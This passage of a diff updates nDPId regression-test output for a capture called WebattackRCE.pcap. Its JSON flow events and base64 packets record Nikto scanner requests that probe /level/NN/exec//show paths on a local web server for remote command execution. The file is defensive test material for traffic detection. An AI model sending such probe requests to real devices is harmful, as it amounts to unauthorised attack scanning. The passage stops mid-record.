00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":584,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":584,"flow_packet_id":1,"flow_last_seen":1576420277614,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277614,"pkt":"AAAAAAAAAAAAAAAACABFAADIgnNAAEAGubp\/AAABfwAAAcYqH5AJ3LqL6hJPloAYAED+vAAAAQEICp1m\/pWdZv6VR0VUIC9sZXZlbC8zNi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":584,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277614,"flow_last_seen":1576420277614,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277614,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50730,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/36\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001283)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":584,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277614,"flow_last_seen":1576420277614,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277614,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50730,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/36\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001283)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":585,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277615,"flow_last_seen":1576420277615,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277615,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50732,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":585,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":585,"flow_packet_id":1,"flow_last_seen":1576420277615,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277615,"pkt":"AAAAAAAAAAAAAAAACABFAADIj29AAEAGrL5\/AAABfwAAAcYsH5DrNbeX8ap25oAYAED+vAAAAQEICp1m\/pedZv6XR0VUIC9sZXZlbC8zNy9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjg0KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":585,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277615,"flow_last_seen":1576420277615,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277615,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50732,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/37\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001284)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":585,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277615,"flow_last_seen":1576420277615,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277615,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50732,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/37\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001284)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":586,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277616,"flow_last_seen":1576420277616,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277616,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50734,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":586,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":586,"flow_packet_id":1,"flow_last_seen":1576420277616,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277616,"pkt":"AAAAAAAAAAAAAAAACABFAADImrpAAEAGoXN\/AAABfwAAAcYuH5CDY6JF2zT1KYAYAED+vAAAAQEICp1m\/pidZv6YR0VUIC9sZXZlbC8zOC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODUpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":586,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277616,"flow_last_seen":1576420277616,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277616,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50734,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/38\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001285)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":586,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277616,"flow_last_seen":1576420277616,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277616,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50734,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/38\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001285)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":587,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277618,"flow_last_seen":1576420277618,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277618,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50736,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":587,"flow_packet_id":1,"flow_last_seen":1576420277618,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277618,"pkt":"AAAAAAAAAAAAAAAACABFAADIUbFAAEAG6nx\/AAABfwAAAcYwH5C3PmlUu95eg4AYAED+vAAAAQEICp1m\/pqdZv6aR0VUIC9sZXZlbC8zOS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODYpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":587,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277618,"flow_last_seen":1576420277618,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277618,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50736,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/39\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001286)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":587,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277618,"flow_last_seen":1576420277618,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277618,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50736,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/39\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001286)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":588,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277619,"flow_last_seen":1576420277619,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277619,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50738,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":588,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":588,"flow_packet_id":1,"flow_last_seen":1576420277619,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277619,"pkt":"AAAAAAAAAAAAAAAACABFAADI5L9AAEAGV25\/AAABfwAAAcYyH5D7t9xCdJSM64AYAED+vAAAAQEICp1m\/pudZv6bR0VUIC9sZXZlbC80MC9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjg3KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":588,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277619,"flow_last_seen":1576420277619,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277619,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50738,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/40\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001287)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":588,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277619,"flow_last_seen":1576420277619,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277619,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50738,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/40\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001287)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":589,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277622,"flow_last_seen":1576420277622,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277622,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50740,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":589,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":589,"flow_packet_id":1,"flow_last_seen":1576420277622,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277622,"pkt":"AAAAAAAAAAAAAAAACABFAADIjX9AAEAGrq5\/AAABfwAAAcY0H5DiALWBzWdeg4AYAED+vAAAAQEICp1m\/p6dZv6eR0VUIC9sZXZlbC80MS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODgpDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":589,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277622,"flow_last_seen":1576420277622,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277622,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50740,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/41\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001288)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":589,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277622,"flow_last_seen":1576420277622,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277622,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50740,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/41\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001288)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":590,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277624,"flow_last_seen":1576420277624,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277624,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50742,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":590,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":590,"flow_packet_id":1,"flow_last_seen":1576420277624,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277624,"pkt":"AAAAAAAAAAAAAAAACABFAADIagJAAEAG0it\/AAABfwAAAcY2H5Bh+1L\/IgWJKIAYAED+vAAAAQEICp1m\/p+dZv6fR0VUIC9sZXZlbC80Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":590,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277624,"flow_last_seen":1576420277624,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277624,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50742,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/42\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001289)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":590,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277624,"flow_last_seen":1576420277624,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277624,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50742,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/42\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001289)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":591,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277625,"flow_last_seen":1576420277625,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277625,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50744,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":591,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":591,"flow_packet_id":1,"flow_last_seen":1576420277625,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277625,"pkt":"AAAAAAAAAAAAAAAACABFAADI3axAAEAGXoF\/AAABfwAAAcY4H5AuBeVV4Hsa\/oAYAED+vAAAAQEICp1m\/qGdZv6hR0VUIC9sZXZlbC80My9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyOTApDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":591,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277625,"flow_last_seen":1576420277625,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277625,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50744,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/43\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001290)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":591,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277625,"flow_last_seen":1576420277625,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277625,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50744,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": 